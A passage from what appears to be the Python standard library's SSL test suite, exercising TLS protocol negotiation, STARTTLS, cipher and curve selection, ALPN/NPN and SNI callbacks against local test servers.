try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = socket_helper.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and has_tls_version('TLSv1_3'):
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@requires_tls_version('TLSv1_3')
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@requires_minimum_version
@requires_tls_version('TLSv1_2')
def test_min_max_version_tlsv1_2(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
@requires_minimum_version
@requires_tls_version('TLSv1_1')
def test_min_max_version_tlsv1_1(self):
client_context, server_context, hostname = testing_context()
# client 1.0 to 1.2, server 1.0 to 1.1
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
@requires_minimum_version
@requires_tls_version('TLSv1_2')
def test_min_max_version_mismatch(self):
client_context, server_context, hostname = testing_context()
# client 1.0, server 1.2 (mismatch)
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
client_context.maximum_version = ssl.TLSVersion.TLSv1
client_context.minimum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@requires_minimum_version
@requires_tls_version('SSLv3')
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_npn_protocols(server_protocols)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
client_context.check_hostname = False
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, SIGNED_CERTFILE_HOSTNAME)
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
